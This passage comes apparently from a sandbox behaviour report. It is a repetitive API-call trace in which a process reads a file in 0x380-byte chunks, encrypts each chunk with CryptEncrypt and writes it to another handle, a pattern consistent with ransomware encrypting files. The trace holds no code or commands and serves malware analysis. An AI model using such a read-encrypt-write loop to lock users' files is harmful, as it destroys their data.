lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.176] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.176] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.176] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.176] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.176] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.176] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.176] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.176] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.176] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.176] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.176] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.176] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.177] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.177] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.177] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.177] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.177] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.177] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.177] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.177] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.177] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.177] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.177] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.177] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.177] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.177] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.178] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.178] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.178] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.178] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.178] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.178] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.178] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.178] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.178] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.179] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.179] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.179] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.179] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.179] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.179] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.179] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.179] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.179] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.179] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.179] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.179] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.179] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.179] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.180] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.180] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.180] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.180] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.180] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.180] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.180] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.180] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.180] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.180] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.181] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.181] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.181] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.181] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.181] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.181] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.181] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.181] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.181] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.181] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.182] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.182] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.182] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.182] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.182] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.182] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.182] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.182] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.182] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.182] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.182] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.182] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.182] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.182] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.182] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.183] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.183] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.183] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.183] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.183] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.183] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.183] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.183] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 